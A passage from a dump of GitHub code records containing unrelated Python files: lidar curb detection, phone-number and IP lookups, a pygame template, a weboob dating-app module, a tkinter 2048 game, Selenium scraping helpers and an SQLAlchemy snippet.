plt.plot(infl_pts[j,0], augmented_range_image[i,int(infl_pts[j,0]),6], 'ro')\n                curb_pts.append(augmented_range_image[i,infl_idx,:3])\n\n                if augmented_range_image[i,int(infl_pts[j,0]),1] > 0:\n                    left_pts.append(augmented_range_image[i,int(infl_pts[j,0]),:3])\n\n                elif augmented_range_image[i,int(infl_pts[j,0]),1] < 0:\n                    right_pts.append(augmented_range_image[i,int(infl_pts[j,0]),:3])\n\n        # min_height_left = np.min(np.array(left_pts)[:,2])\n        # min_height_right = np.min(np.array(right_pts)[:,2])\n\n        if len(left_pts) > 0:\n            min_height_left = np.min(np.array(left_pts)[:,2])\n            print(\"min height left: \" + str(min_height_left))\n            for pt in left_pts:\n                if pt[2] < min_height_left+0.13:\n                    left_curb_pts.append(pt)\n\n        if len(right_pts) > 0:\n            min_height_right = np.min(np.array(right_pts)[:,2])\n            print(\"min height right: \" + str(min_height_right))\n            for pt in right_pts:\n                if pt[2] < min_height_right+0.13:\n                    right_curb_pts.append(pt)\n\n        #plot results\n        # plt.plot(augmented_range_image[i,:,0])\n        # plt.plot(augmented_range_image[i,:,1])\n        # plt.plot(augmented_range_image[i,:,2])\n        # plt.plot(augmented_range_image[i,:,6])\n        # plt.plot(m_filt)\n        # plt.plot(infl_pts[:,0],infl_pts[:,1],'go')\n        # plt.plot(augmented_range_image[i+1,:,6] - augmented_range_image[i,:,6])\n        # plt.show()\n\n    if len(left_curb_pts) > 0:\n        model_left, inliers = ransac( np.array(left_curb_pts)[:,:2], LineModel, min_samples=2, residual_threshold=.5, max_trials=1000)\n        outliers = inliers == False\n        x_left = np.arange(5,15,0.2)\n        y_left = model_left.predict_y(x_left)\n        z_left = -1.5\n\n    if len(right_curb_pts) > 0:\n        model_right, inliers = ransac( np.array(right_curb_pts)[:,:2], LineModel, min_samples=2, residual_threshold=1, max_trials=1000)\n        outliers = inliers == False\n        x_right = np.arange(5,15,0.2)\n        y_right = model_right.predict_y(x_right)\n        z_right = -1.5\n\n    print(\"exec time: \" + str(time.time() - start_time))\n\n    geom = []\n\n    # visualize pointcloud\n\n    for pt in curb_pts:\n        pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.2)\n        pcd.paint_uniform_color(np.array([[1.0],[0.0],[0.0]], dtype=np.float64))\n        pcd.translate(pt)\n        geom.append(pcd)\n    \n    for pt in left_curb_pts:\n        pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.4)\n        pcd.paint_uniform_color(np.array([[1.0],[1.0],[0.0]], dtype=np.float64))\n        pcd.translate(pt)\n        geom.append(pcd)\n    \n    for pt in right_curb_pts:\n        pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.4)\n        pcd.paint_uniform_color(np.array([[1.0],[0.0],[1.0]], dtype=np.float64))\n        pcd.translate(pt)\n        geom.append(pcd)\n\n    # guard the fitted-line spheres: x_left/y_left (and the right-hand pair)\n    # exist only when a curb line was actually fitted above\n    if len(left_curb_pts) > 0:\n        for i in range(y_left.shape[0]):\n            pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.3)\n            pcd.paint_uniform_color(np.array([[0.0],[0.5],[0.5]], dtype=np.float64))\n            pcd.translate([x_left[i],y_left[i],z_left])\n            geom.append(pcd)\n    \n    if len(right_curb_pts) > 0:\n        for i in range(y_right.shape[0]):\n            pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.3)\n            pcd.paint_uniform_color(np.array([[0.0],[0.5],[0.5]], dtype=np.float64))\n            pcd.translate([x_right[i],y_right[i],z_right])\n            geom.append(pcd)\n\n    mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=3.0, origin=np.array([0., 0., 0.]))\n    geom.append(mesh_frame)\n\n    pcd_test = o3d.geometry.PointCloud()\n    pcd_test.points = o3d.utility.Vector3dVector(pc[:,:3])\n    pcd_test.paint_uniform_color(np.array([[0.0],[0.8],[0.0]], dtype=np.float64))\n    geom.append(pcd_test)\n\n    o3d.visualization.draw_geometries(geom)","repo_name":"moloydas/road_segmentation_lidar","sub_path":"segment_road_v4.py","file_name":"segment_road_v4.py","file_ext":"py","file_size_in_byte":7075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"35845435470","text":"# Install the phonenumbers module by typing the following command in command prompt.\n# pip install phonenumbers\nimport phonenumbers\nfrom phonenumbers import carrier, geocoder, timezone\nmobileNo = input(\"Enter Mobile Number with Country code: \")\nmobileNo = phonenumbers.parse(mobileNo)\n\n# get the timezone of a phone number\ntimeZone = timezone.time_zones_for_number(mobileNo)\nprint(\"timezone: \", timeZone)\n# Getting carrier of a phone number\nCarrier = carrier.name_for_number(mobileNo, 'en')\n# Getting region information\nRegion = geocoder.description_for_number(mobileNo, 'en')\n# Printing the carrier and region of a phone number\nprint(\"Carrier: \", Carrier)\nprint(\"Region: \", Region)\n# Validating a phone number\nvalid = 
phonenumbers.is_valid_number(mobileNo)\n# Checking possibility of a number\npossible = phonenumbers.is_possible_number(mobileNo)\n# Printing the output\nprint(\"Valid: \", valid)\nprint(\"Possible: \", possible)\n","repo_name":"darishodzic/Phone-number-details","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74938330481","text":"import pygame\nimport cdkk\nimport random\n\napp_styles = {\n \"Ninja\": {\"fillcolour\": \"yellow\", \"shape\": \"Ellipse\", \"width\": 80, \"height\": 60}\n}\ncdkk.stylesheet.add_stylesheet(app_styles)\n\n# --------------------------------------------------\n\n\nclass Sprite_Ninja(cdkk.Sprite_TextBox):\n def __init__(self, posx, posy):\n super().__init__(\"Ninja\", style=cdkk.stylesheet.style(\"Ninja\"))\n self.rect.left = posx\n self.rect.top = posy\n # Initialise the Ninja sprite\n\n def start_game(self):\n super().start_game()\n self.set_style(\"fillcolour\", \"green\")\n\n def end_game(self):\n self.set_style(\"fillcolour\", \"red1\")\n super().end_game()\n\n def update(self):\n super().update()\n # Update is called for the sprite during every game loop\n\n def draw(self):\n super().draw()\n # Draw is called for the sprite during every game loop\n\n\n# --------------------------------------------------\n\nclass Manager_Ninja(cdkk.SpriteManager):\n def __init__(self, limits):\n super().__init__(\"Ninja Manager\")\n self.limits = limits\n\n def event(self, e):\n dealt_with = super().event(e)\n if not dealt_with and e.type == cdkk.EVENT_GAME_CONTROL:\n if e.action == \"NewNinja\":\n self.add_ninja()\n dealt_with = True\n elif e.action == \"ClearNinjas\":\n self.clear_ninjas()\n dealt_with = True\n return dealt_with\n\n def move_cave_items(self):\n sprites = self.find_sprites_by_desc(\"Cave Item\", True)\n for s in sprites:\n s.scroll(-self.cave.cave_section_size)\n\n def add_ninja(self):\n posx = random.randint(0, self.limits.width-200) + 100\n posy = random.randint(0, self.limits.height-150) + 75\n self.add(Sprite_Ninja(posx, posy))\n\n def clear_ninjas(self):\n self.empty()\n\n def update(self):\n super().update()\n # Update is called for the sprite during every game loop\n # For moving objects, call self.rect.move_physics() or use self.set_config(\"auto_move_physics\", True)\n\n def start_game(self):\n super().start_game()\n # This is called each time a game starts\n # Typically this is where sprites are created/reset\n\n def end_game(self):\n # This is called each time a game ends\n # Typically this is where sprites are removed\n super().end_game()\n\n# --------------------------------------------------\n\n\nclass Manager_Scoreboard(cdkk.SpriteManager):\n def __init__(self, game_time, limits):\n super().__init__(\"Scoreboard Manager\")\n score_style = {\"fillcolour\": None, \"align_horiz\": \"L\"}\n\n self._game_time = game_time\n self._timer = None\n self._time_left = cdkk.Sprite_DynamicText(\n \"Time Left\", cdkk.cdkkRect(10, 10, 200, 40), score_style)\n self._time_left.set_text_format(\"Time Left: {0:0.1f}\", 0)\n self.add(self._time_left)\n\n self._fps = cdkk.Sprite_DynamicText(\n \"FPS\", cdkk.cdkkRect(10, 60, 200, 40), score_style)\n self._fps.set_text_format(\"FPS: {0:4.1f}\", 0)\n self.add(self._fps)\n\n self._game_over = cdkk.Sprite_GameOver(limits)\n\n def set_fps(self, new_fps):\n self._fps.set_text(new_fps)\n\n def slow_update(self):\n # This is called around 3 times per sec and is for updates that 
don't need to happen every game loop\n if self.game_is_active:\n self._time_left.set_text(self._timer.time_left)\n\n def start_game(self):\n super().start_game()\n self._timer = cdkk.Timer(\n self._game_time, cdkk.EVENT_GAME_TIMER_1, auto_start=True)\n self.remove(self._game_over)\n\n def end_game(self):\n self.add(self._game_over)\n super().end_game()\n\n# --------------------------------------------------\n\n\nclass MyGame(cdkk.PyGameApp):\n def init(self):\n super().init()\n\n self.ninja_mgr = Manager_Ninja(self.boundary)\n self.scoreboard_mgr = Manager_Scoreboard(10, self.boundary)\n\n self.add_sprite_mgr(self.ninja_mgr)\n self.add_sprite_mgr(self.scoreboard_mgr)\n\n key_map = {\n pygame.K_q: \"Quit\",\n pygame.K_s: \"StartGame\",\n pygame.K_n: \"NewNinja\",\n pygame.K_e: \"GameOver\",\n pygame.K_c: \"ClearNinjas\"\n }\n user_event_map = {\n cdkk.EVENT_GAME_TIMER_1: \"GameOver\"\n }\n self.event_mgr.event_map(\n key_event_map=key_map, user_event_map=user_event_map)\n\n def update(self):\n super().update()\n self.scoreboard_mgr.set_fps(theApp.loops_per_sec)\n # Manage interaction between Sprites in different SpriteManagers\n\n# --------------------------------------------------\n\n\napp_config = {\n \"width\": 1200, \"height\": 800,\n \"background_fill\": \"burlywood\",\n \"caption\": \"My Game\",\n \"auto_start\": False\n}\ntheApp = MyGame(app_config)\ntheApp.execute()\n","repo_name":"BrianDunneKK/cdkk","sub_path":"pygame/cdkkGameTemplate.py","file_name":"cdkkGameTemplate.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9429737841","text":"import datetime\n\nfrom weboob.tools.compat import unicode\nfrom weboob.capabilities.messages import CapMessages, CapMessagesPost, Thread, Message\nfrom weboob.capabilities.dating import CapDating, Optimization\nfrom weboob.capabilities.account import CapAccount, StatusField\nfrom weboob.tools.backend import Module, BackendConfig\nfrom weboob.tools.value import Value, ValueBackendPassword\nfrom weboob.tools.date import local2utc\nfrom weboob.tools.log import getLogger\n\nfrom .browser import PlayMeBrowser, FacebookBrowser, NoCredits\n\n\n__all__ = ['PlayMeModule']\n\n\nclass ProfilesWalker(Optimization):\n def __init__(self, sched, storage, browser):\n super(ProfilesWalker, self).__init__()\n self._sched = sched\n self._storage = storage\n self._browser = browser\n self._logger = getLogger('walker', browser.logger)\n\n self._view_cron = None\n\n def start(self):\n self._view_cron = self._sched.schedule(1, self.view_profile)\n return True\n\n def stop(self):\n self._sched.cancel(self._view_cron)\n self._view_cron = None\n return True\n\n def set_config(self, params):\n pass\n\n def is_running(self):\n return self._view_cron is not None\n\n def view_profile(self):\n delay = 900\n try:\n challenged = self._storage.get('challenged', default=[])\n for user in self._browser.find_users(48.883989, 2.367168):\n if user['id'] in challenged:\n continue\n\n try:\n self._browser.challenge(user['id'])\n except NoCredits as e:\n delay = int(str(e))\n self._logger.info('No more credits (next try in %d minutes)', (delay/60))\n else:\n self._logger.info('Challenged %s', user['name'])\n challenged.append(user['id'])\n self._storage.set('challenged', challenged)\n self._storage.save()\n break\n finally:\n if self._view_cron is not None:\n self._view_cron = self._sched.schedule(delay, self.view_profile)\n\n\nclass PlayMeModule(Module, CapMessages, CapMessagesPost, 
CapDating, CapAccount):\n NAME = 'playme'\n DESCRIPTION = u'PlayMe dating mobile application'\n MAINTAINER = u'Roger Philibert'\n EMAIL = 'roger.philibert@gmail.com'\n LICENSE = 'AGPLv3+'\n VERSION = '2.1'\n CONFIG = BackendConfig(Value('username', label='Facebook email'),\n ValueBackendPassword('password', label='Facebook password'))\n\n BROWSER = PlayMeBrowser\n STORAGE = {'contacts': {},\n 'challenged': [],\n }\n\n def create_default_browser(self):\n facebook = FacebookBrowser()\n facebook.login(self.config['username'].get(),\n self.config['password'].get())\n return self.create_browser(facebook)\n\n # ---- CapDating methods -----------------------\n\n def init_optimizations(self):\n self.add_optimization('PROFILE_WALKER', ProfilesWalker(self.weboob.scheduler, self.storage, self.browser))\n\n # ---- CapMessages methods ---------------------\n\n def fill_thread(self, thread, fields):\n return self.get_thread(thread)\n\n def iter_threads(self):\n for thread in self.browser.get_threads():\n t = Thread(thread['id'])\n t.flags = Thread.IS_DISCUSSION\n t.title = u'Discussion with %s' % thread['name']\n t.date = local2utc(datetime.datetime.fromtimestamp(thread['last_message']['utc_timestamp']))\n yield t\n\n def get_thread(self, thread):\n if not isinstance(thread, Thread):\n thread = Thread(thread)\n thread.flags = Thread.IS_DISCUSSION\n\n user = self.browser.get_user(thread.id)\n thread.title = u'Discussion with %s' % user['name']\n\n contact = self.storage.get('contacts', thread.id, default={'lastmsg': 0})\n\n signature = u'Age: %s' % user['age']\n signature += u'\\nLast online: %s' % user['last_online']\n signature += u'\\nPhotos:\\n\\t%s' % '\\n\\t'.join([user['photo_host'] + photo['large'] for photo in user['photos']])\n\n child = None\n\n for msg in self.browser.get_thread_messages(thread.id):\n flags = 0\n if int(contact['lastmsg']) < msg['utc_timestamp']:\n flags = Message.IS_UNREAD\n\n if msg['type'] == 'msg':\n content = unicode(msg['msg'])\n elif msg['type'] == 'new_challenge':\n content = u'A new challenge has been proposed!'\n elif msg['type'] == 'serie':\n content = u\"I've played\"\n elif msg['type'] == 'end_game':\n content = u'%s is the winner! 
(%s VS %s)' % (self.browser.my_name if msg['score']['w'] == self.browser.my_id else user['name'], msg['score']['s'][0], msg['score']['s'][1])\n else:\n content = u'Unknown action: %s' % msg['type']\n\n msg = Message(thread=thread,\n id=msg['utc_timestamp'],\n title=thread.title,\n sender=unicode(self.browser.my_name if msg['from'] == self.browser.my_id else user['name']),\n receivers=[unicode(self.browser.my_name if msg['from'] != self.browser.my_id else user['name'])],\n date=local2utc(datetime.datetime.fromtimestamp(msg['utc_timestamp'])),\n content=content,\n children=[],\n parent=None,\n signature=signature if msg['from'] != self.browser.my_id else u'',\n flags=flags)\n\n if child:\n msg.children.append(child)\n child.parent = msg\n child = msg\n thread.root = child\n\n return thread\n\n def iter_unread_messages(self):\n for thread in self.iter_threads():\n thread = self.get_thread(thread)\n for message in thread.iter_all_messages():\n if message.flags & message.IS_UNREAD:\n yield message\n\n def set_message_read(self, message):\n contact = self.storage.get('contacts', message.thread.id, default={'lastmsg': 0})\n if int(contact['lastmsg']) < int(message.id):\n contact['lastmsg'] = int(message.id)\n self.storage.set('contacts', message.thread.id, contact)\n self.storage.save()\n\n # ---- CapMessagesPost methods ---------------------\n\n def post_message(self, message):\n self.browser.post_message(message.thread.id, message.content)\n\n # ---- CapAccount methods ---------------------\n\n def get_account_status(self):\n return (StatusField(u'myname', u'My name', unicode(self.browser.my_name)),\n StatusField(u'credits', u'Credits', unicode(self.browser.credits)),\n )\n\n OBJECTS = {Thread: fill_thread,\n }\n","repo_name":"laurentb/weboob","sub_path":"modules/playme/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"75"} +{"seq_id":"38352687702","text":"from tkinter import *\r\nfrom Logic import *\r\nimport Colours\r\n\r\nfrom random import randint\r\nfrom copy import deepcopy\r\n\r\n\r\nclass Game:\r\n def __init__(self, board):\r\n self.board = board\r\n self.root = Tk()\r\n self.root.title(\"2048\")\r\n self.root.geometry(\"345x440\")\r\n self.root.resizable(False, False)\r\n\r\n game_name = Label(\r\n self.root,\r\n text=\"2048\",\r\n fg=\"#776e65\",\r\n font=(\r\n \"Sans Serif\",\r\n 55),\r\n anchor=\"nw\")\r\n game_name.place(x=17, y=20, width=160, height=100)\r\n\r\n objective1 = Label(\r\n self.root,\r\n text=\"Join the numbers and get to the\",\r\n fg=\"#776e65\",\r\n font=(\r\n \"Arial\",\r\n 7),\r\n anchor=\"w\")\r\n objective1.place(x=17, y=85, width=150, height=15)\r\n self.objective2 = Label(\r\n self.root, fg=\"#776e65\", font=(\r\n \"Arial\", 7, \"bold\"), anchor=\"w\")\r\n self.objective2.place(x=153, y=85, width=60, height=15)\r\n\r\n self.game_name_3x3 = Label(\r\n self.root, fg=\"#776e65\", font=(\r\n \"Sans Serif\", 10, \"bold\"))\r\n self.game_name_3x3.place(x=130, y=53)\r\n\r\n sc_frame = LabelFrame(self.root, bg=Colours.score_label_bg, bd=0)\r\n sc_frame.place(x=210, y=40, width=55, height=30)\r\n\r\n sc_head = Label(\r\n sc_frame,\r\n text=\"SCORE\",\r\n font=(\r\n \"Sans Serif\",\r\n 7,\r\n \"bold\"),\r\n fg=\"#eee4da\",\r\n bg=Colours.score_label_bg)\r\n sc_head.place(x=3, y=16, width=50, height=12)\r\n self.score_value = Label(sc_frame, text=str(self.board.score), font=(\r\n \"Sans Serif\", 10, \"bold\"), fg=\"#faf5ef\", 
bg=Colours.score_label_bg)\r\n self.score_value.place(x=3, y=2, width=50, height=15)\r\n\r\n self.hi_sc()\r\n\r\n hsc_frame = LabelFrame(self.root, bg=Colours.score_label_bg, bd=0)\r\n hsc_frame.place(x=270, y=40, width=55, height=30)\r\n\r\n hsc_head = Label(\r\n hsc_frame,\r\n text=\"BEST\",\r\n font=(\r\n \"Sans Serif\",\r\n 7,\r\n \"bold\"),\r\n fg=\"#eee4da\",\r\n bg=Colours.score_label_bg)\r\n hsc_head.place(x=3, y=16, width=50, height=12)\r\n self.hsc_value = Label(\r\n hsc_frame,\r\n text=self.hi_score,\r\n font=(\r\n \"Sans Serif\",\r\n 10,\r\n \"bold\"),\r\n fg=\"#faf5ef\",\r\n bg=Colours.score_label_bg)\r\n self.hsc_value.place(x=3, y=2, width=50, height=15)\r\n\r\n und = Button(\r\n self.root,\r\n text=\"Undo\",\r\n width=32,\r\n height=4,\r\n font=(\r\n \"Arial\",\r\n 8,\r\n \"bold\"),\r\n fg=\"#faf5ef\",\r\n bg=\"#776e65\",\r\n command=self.undo,\r\n relief=FLAT)\r\n und.place(x=227, y=80, width=33, height=20)\r\n res = Button(\r\n self.root,\r\n text=\"New\",\r\n width=32,\r\n height=4,\r\n font=(\r\n \"Arial\",\r\n 8,\r\n \"bold\"),\r\n fg=\"#faf5ef\",\r\n bg=\"#776e65\",\r\n command=self.restart,\r\n relief=FLAT)\r\n res.place(x=264, y=80, width=30, height=20)\r\n self.gmde = Button(\r\n self.root,\r\n text=\"3x3\",\r\n width=32,\r\n height=4,\r\n font=(\r\n \"Arial\",\r\n 8,\r\n \"bold\"),\r\n fg=\"#faf5ef\",\r\n bg=\"#776e65\",\r\n command=self.change_mode,\r\n relief=FLAT)\r\n self.gmde.place(x=298, y=80, width=27, height=20)\r\n\r\n self.set_board()\r\n\r\n self.root.mainloop()\r\n\r\n def set_board(self):\r\n self.screen = LabelFrame(self.root, bg=Colours.bord_colour, bd=0)\r\n self.screen.place(x=20, y=115, width=305, height=305)\r\n self.objective2[\"text\"] = str(self.board.num) + \" tile!\"\r\n\r\n if self.board.size == 3:\r\n self.game_name_3x3[\"text\"] = \"3x3\"\r\n else:\r\n self.game_name_3x3[\"text\"] = \"\"\r\n tl = Colours.tile_len[self.board.size]\r\n\r\n self.values = [[0 for i in range(self.board.size)]\r\n for j in range(self.board.size)]\r\n for indrow, row in enumerate(self.board.game_matrix):\r\n for indcol, col in enumerate(row):\r\n ele = Label(self.screen)\r\n self.values[indrow][indcol] = ele\r\n ele.place(x=5 + indcol * (tl + 5), y=5 +\r\n indrow * (tl + 5), width=tl, height=tl)\r\n\r\n self.display_board()\r\n\r\n self.arrow_keys = {\r\n \"Up\": self.board.moveup,\r\n \"Down\": self.board.movedown,\r\n \"Right\": self.board.moveright,\r\n \"Left\": self.board.moveleft}\r\n self.root.bind(\"\", self.moves)\r\n\r\n def display_board(self):\r\n self.score_value[\"text\"] = str(self.board.score)\r\n for indrow, row in enumerate(self.board.game_matrix):\r\n for indcell, cell in enumerate(row):\r\n if cell == 0:\r\n self.values[indrow][indcell][\"text\"] = \"\"\r\n self.values[indrow][indcell][\"bg\"] = Colours.emp_cell_colour\r\n else:\r\n self.values[indrow][indcell][\"text\"] = cell\r\n self.values[indrow][indcell][\"fg\"] = Colours.num_colour[cell]\r\n self.values[indrow][indcell][\"bg\"] = Colours.cell_colour[cell]\r\n self.values[indrow][indcell][\"font\"] = Colours.num_font[self.board.size][cell]\r\n\r\n self.hi_sc()\r\n\r\n def game_status(self):\r\n if self.board.game_won() or self.board.game_over():\r\n self.root.unbind(\"\")\r\n if self.board.game_won():\r\n self.text1 = \"You Won!\\nDo you want to continue?\"\r\n else:\r\n self.text1 = \"Game Over!\\nDo you want to play again?\"\r\n\r\n self.game_status_frame = LabelFrame(self.root, bg=\"#faf5ef\", bd=0)\r\n self.game_status_frame.place(x=50, y=220, width=245, height=95)\r\n\r\n 
game_status_label = Label(\r\n                self.game_status_frame,\r\n                text=self.text1,\r\n                fg=\"#776e65\",\r\n                bg=\"#faf5ef\",\r\n                font=(\r\n                    \"Arial\",\r\n                    12,\r\n                    \"bold\"))\r\n            game_status_label.place(x=12, y=9, width=220, height=40)\r\n\r\n            yes_button = Button(\r\n                self.game_status_frame,\r\n                text=\"Yes\",\r\n                fg=\"#faf5ef\",\r\n                bg=Colours.button_colour,\r\n                command=self.yes,\r\n                font=(\r\n                    \"Sans Serif\",\r\n                    9,\r\n                    \"bold\"),\r\n                relief=FLAT)\r\n            yes_button.place(x=85, y=55, width=35, height=25)\r\n\r\n            no_button = Button(\r\n                self.game_status_frame,\r\n                text=\"No\",\r\n                fg=\"#faf5ef\",\r\n                bg=Colours.button_colour,\r\n                command=self.root.destroy,\r\n                font=(\r\n                    \"Sans Serif\",\r\n                    9,\r\n                    \"bold\"),\r\n                relief=FLAT)\r\n            no_button.place(x=125, y=55, width=35, height=25)\r\n\r\n    def hi_sc(self):\r\n        with open(\"High Score.txt\") as f:\r\n            high_scores = f.read().split()\r\n            self.hi_score = high_scores[self.board.size - 3]\r\n        with open(\"High Score.txt\", \"w\") as f:\r\n            if int(self.hi_score) < self.board.score:\r\n                self.hi_score = str(self.board.score)\r\n                self.hsc_value[\"text\"] = high_scores[self.board.size -\r\n                                                     3] = self.hi_score\r\n            high_scores = \"\\n\".join(high_scores)\r\n            f.write(high_scores)\r\n\r\n    def yes(self):\r\n        self.game_status_frame.destroy()\r\n        if self.board.game_won():\r\n            self.board.num *= 2\r\n            self.root.bind(\"\", self.moves)\r\n            self.objective2[\"text\"] = str(self.board.num) + \" tile!\"\r\n        if self.board.game_over():\r\n            self.screen.destroy()\r\n            self.board.__init__(self.board.size)\r\n            self.set_board()\r\n\r\n    def restart(self):\r\n        self.screen.destroy()\r\n        self.board.__init__(self.board.size)\r\n        self.set_board()\r\n\r\n    def undo(self):\r\n        if self.board.game_over():\r\n            self.game_status_frame.destroy()\r\n            self.root.bind(\"\", self.moves)\r\n        if len(self.board.gamematrix_undo) >= 1:\r\n            self.board.game_matrix = self.board.gamematrix_undo.pop()\r\n            self.board.score = self.board.score_undo.pop()\r\n            self.display_board()\r\n\r\n    def change_mode(self):\r\n        if self.board.size == 4:\r\n            self.board.size = 3\r\n            self.gmde[\"text\"] = \"4x4\"\r\n        else:\r\n            self.board.size = 4\r\n            self.gmde[\"text\"] = \"3x3\"\r\n        self.screen.destroy()\r\n        self.board.__init__(self.board.size)\r\n        self.set_board()\r\n        self.hsc_value[\"text\"] = self.hi_score\r\n\r\n    def moves(self, event):\r\n        if event.keysym in self.arrow_keys:\r\n            self.arrow_keys[event.keysym]()\r\n            self.display_board()\r\n            self.game_status()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    board = Board(4)\r\n    game = Game(board)\r\n","repo_name":"Nigel007/Python-Tkinter","sub_path":"2048/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":9609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"14377815222","text":"'''\nExercise 3.\nA table of integers is entered.\nUsing the map function and a list comprehension,\nconvert the list of strings lst_in (see the listing)\ninto a two-dimensional list named lst2D containing integers.\nNothing needs to be printed to the screen,\nonly build the lst2D list from the entered data.\nSample Input:\n8 11 -5\n3 4 10\n-1 -2 3\n4 5 6\nSample Output:\nTrue\n'''\n\n\n\n\nimport sys\ntest_str = \"8 11 -5\" \\\n           \"3 4 10\" \\\n           \"-1 -2 3\" \\\n           \"4 5 6\"\nlst_in = list(map(str.strip, sys.stdin.readlines()))\nlst2D = map(str.split, lst_in)\nprint(lst_in)\nprint(lst2D)\n\nlst_test = []\nfor x in lst2D:\n    lst_temp = []\n    for y in x:\n        lst_temp.append(int(y))\n    lst_test.append(lst_temp)\nprint(lst_test)\n\ng = [list(int(y) for y in x) for x in map(str.split,lst_in)]\ng_2 = [list(map(int, x.split())) for x in lst_in]\nprint(g)\n","repo_name":"JakiffCousto/Course_Stepik_Python_Sergey_Balakirev","sub_path":"9_3_map/9_3_3.py","file_name":"9_3_3.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35045475273","text":"import requests\n\n# Prompt the user to enter the IP address\nip_address = input(\"Enter the IP address: \")\n\n# Construct the API URL with the user-provided IP address\napi_url = f\"https://api.api-ninjas.com/v1/iplookup?address={ip_address}\"\n\n# Make the API request\nresponse = requests.get(api_url, headers={\"X-Api-Key\": \"KEY\"})\n\n# Process the API response\nif response.status_code == 200:\n    data = response.json()\n    if \"country\" in data:\n        print(\"Country:\", data[\"country\"])\n    else:\n        print(\"Country information not available.\")\n    \n    if \"region\" in data:\n        print(\"Region:\", data[\"region\"])\n    else:\n        print(\"Region information not available.\")\n    \n    if \"city\" in data:\n        print(\"City:\", data[\"city\"])\n    else:\n        print(\"City information not available.\")\n    \n    if \"latitude\" in data and \"longitude\" in data:\n        print(\"Latitude:\", data[\"latitude\"])\n        print(\"Longitude:\", data[\"longitude\"])\n    else:\n        print(\"Latitude and longitude information not available.\")\n    \n    # ... 
add more fields as needed\nelse:\n print(\"Error:\", response.status_code, response.text)\n","repo_name":"Kaiasaurin/Python-Projects","sub_path":"IP Lookup.py","file_name":"IP Lookup.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"38984200177","text":"import importlib\nimport inspect\nimport logging\nimport os\nimport sys\nimport time\nimport traceback\nfrom datetime import datetime\nfrom selenium import webdriver\nsys.path.append('.')\nimport of_spider\n\ndef sleep(seconds):\n time.sleep(seconds)\n\ndef create_chrome_driver():\n options = webdriver.ChromeOptions()\n # options.add_argument('--headless')\n # options.add_argument('--disable-gpu')\n options.add_argument('--ignore-certificate-errors')\n # prefs = {'profile.managed_default_content_settings.images': 2}\n # options.add_experimental_option('prefs',prefs)\n driver = webdriver.Chrome(chrome_options=options)\n driver.maximize_window()\n return driver\n\ndef find_element_by_css_selector(element, selector):\n try:\n return element.find_element_by_css_selector(selector)\n except:\n return None\n\ndef find_elements_by_css_selector(element, selector):\n try:\n return element.find_elements_by_css_selector(selector)\n except:\n return []\n \ndef create_flogger(filename, level=logging.INFO):\n logger = logging.getLogger(filename)\n logger.setLevel(level)\n dt = datetime.now()\n fh = logging.FileHandler(filename + '_' + dt.strftime('%Y-%m-%d') + '_' + str(os.getpid()) + '.log')\n fh.setLevel(level)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n return logger\n\ndef get_domain(url):\n return url.split('://')[1].split('/')[0]\n\ndef load_spiders(path, logger):\n spiders = {}\n files = os.listdir(path)\n for f in files:\n f_path = os.path.join(path, f)\n if os.path.isfile(f_path) and \\\n (not f.startswith('__init__')) and \\\n f.endswith('.py'):\n mod = importlib.import_module('%s.%s' % (path, f[:-3]))\n for var in dir(mod):\n obj = getattr(mod, var)\n try:\n if issubclass(obj, of_spider.Spider):\n var = var.lower()\n spiders[var] = obj(logger)\n except:\n pass\n return spiders\n\ndef get_base_url(url):\n return url.split('?')[0]\n\ndef get_url_parameters(url):\n parameters = {}\n kvs = url.split('?')[-1].split('&')\n for kv in kvs:\n k, v = kv.split('=')\n parameters[k] = v\n return parameters\n\ndef convert_price(price):\n try:\n return int(float(price.replace('¥','').replace('¥','').replace(',','').replace('人民币','').replace('RMB','').replace('CNY','')))\n except Exception as e:\n print(e)\n return 0\n\ndef find_element_by_xpath(element, selector):\n try:\n return element.find_element_by_xpath(selector)\n except:\n return None\n\ndef find_elements_by_xpath(element, selector):\n try:\n return element.find_elements_by_xpath(selector)\n except:\n return []","repo_name":"yingl/ofashion_spider","sub_path":"of_utils.py","file_name":"of_utils.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"33315665316","text":"#!/usr/bin/python3\n\"\"\" module for defining the fetch first state module \"\"\"\n\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\nfrom sys import argv\n\nif __name__ == \"__main__\":\n usr = argv[1]\n pwd = argv[2]\n db_ = argv[3]\n\n engine = 
